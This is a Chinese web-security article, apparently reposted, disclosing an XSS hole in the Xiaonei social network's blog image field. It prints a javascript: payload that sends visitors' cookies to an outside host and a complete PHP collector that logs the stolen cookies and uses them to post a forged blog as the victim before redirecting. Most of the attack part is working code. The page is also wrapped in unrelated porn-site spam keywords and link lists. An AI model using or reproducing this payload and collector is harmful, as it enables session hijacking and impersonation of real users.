成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

校內(nèi)網(wǎng)最新xss可竊Cookies密碼

作者:佚名
安全 網(wǎng)站安全
校內(nèi)網(wǎng)在發(fā)blog時對插入圖片過濾不嚴(yán)格,存在xss漏洞.

校內(nèi)網(wǎng)在發(fā)blog時對插入圖片過濾不嚴(yán)格,存在xss漏洞。

在發(fā)blog時將插入圖片URL寫為如下代碼即可觸發(fā):普通瀏覽復(fù)制代碼打印代碼

javascript:window.location.href='http://www.xxx.com/test.
 href="tag.php?name=php">php?cookie='+document.cookie  

javascript:window.location.+document.cookie test.php的作用是竊取cookie、偽造閱覽者身份發(fā)一個blog、跳轉(zhuǎn)到一個正常的日志,代碼如下:普通瀏覽復(fù)制代碼打印代碼

ob_start();    
$url = 'blog.xiaonei.com';   
$cookie=$_GET['cookie'];   
$cookie1=$cookie."\r\n\r\n";   
fputs(fopen('a.txt','a+'),$cookie1); //cookie寫入 a.txt   
//發(fā)一條偽造的日志,這條日志里面也可以插入惡意代碼   
$sock = fsockopen("$url", 80, $errno, $errstr, 30);   
if (!$sock) die("$errstr ($errno)\n");   
$data = "title=test by fly&body=test by 
fly&categoryId=0&blogControl=99&passwordProtedted=0&
passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";   
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");   
fwrite($sock, "Accept: */*\r\n");   
fwrite($sock, "Referer: http://$url\r\n");   
fwrite($sock, "Accept-Language: zh-cn\r\n");   
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");   
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");   
fwrite($sock, "User-Agent: Mozilla\r\n");   
fwrite($sock, "Host: $url\r\n");   
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");   
fwrite($sock, "Connection: Keep-Alive\r\n");   
fwrite($sock, "Cache-Control: no-cache\r\n");   
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");   
fwrite($sock, $data);   
$headers = "";   
while ($str = trim(fgets($sock, 4096)))   
$headers .= "$str\n";   
echo "\n";   
$body = "";   
while (!feof($sock))   
$body .= fgets($sock, 4096);   
fclose($sock);   
//echo $body;   
//跳轉(zhuǎn)到一個正常的日志   
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");    
ob_end_flush();   
?>

 

【編輯推薦】

  1. 一只完整的XSS wrom實(shí)現(xiàn)流程
  2. XSS攻擊Cookie欺騙中隱藏JavaScript執(zhí)行
  3. 利用HTTP-only Cookie緩解XSS之痛
責(zé)任編輯:佚名 來源: 黑軟基地
代碼校內(nèi)網(wǎng)Cookies密碼cookie
相關(guān)推薦

2011-02-24 13:34:09

資源共享

2009-04-25 00:18:33

2009-03-18 08:53:01

校內(nèi)網(wǎng)用戶條款賬號

2025-04-24 10:09:58

2015-06-12 10:27:46

2014-08-25 10:21:41

2010-09-14 22:14:29

2011-03-25 13:38:58

2013-03-19 10:48:30

CookiesInPrivate

2013-01-09 14:17:59

2009-02-04 11:24:12

2022-02-15 13:50:31

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2011-05-31 15:01:50

2011-02-20 18:48:27

2015-02-05 15:58:06

2013-04-17 10:01:52

jwplayerXSS漏洞

2010-05-15 16:04:52

法國興業(yè)銀行DLP商業(yè)機(jī)密

2010-11-09 13:47:30

2009-03-11 11:52:08

開放平臺

2012-05-30 16:25:30

密碼安全
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲精品亚洲人成人网 | 亚洲电影在线播放 | 亚洲欧美在线观看 | 日韩精品 电影一区 亚洲 | 日韩在线精品 | 91精品国产乱码久久久 | 国产成人午夜精品影院游乐网 | 97色在线视频 | 国产视频久久 | 免费av观看 | 91高清在线观看 | 精品真实国产乱文在线 | 日本久久一区二区三区 | 国产网站在线播放 | 中文字幕日韩三级 | 亚洲人成在线观看 | 国产污视频在线 | 欧美日韩精品中文字幕 | 久久久久久久综合色一本 | 久久av一区 | 国产美女精品视频 | 亚洲精品久久久久久久久久久 | 日本午夜免费福利视频 | 欧美女优在线观看 | av黄色免费在线观看 | 国产日韩欧美在线一区 | 男女羞羞视频在线 | 亚洲精品国产区 | 国产高清在线精品 | 日韩一区二区三区精品 | 蜜臀久久99精品久久久久久宅男 | 视频在线一区二区 | 成人一区av | 蜜桃av一区二区三区 | 鸡毛片 | 国产一二三区电影 | 天堂色网| 欧洲成人免费视频 | 亚洲成人网在线 | 日韩欧美一区二区三区免费观看 | 精品国产伦一区二区三区观看方式 |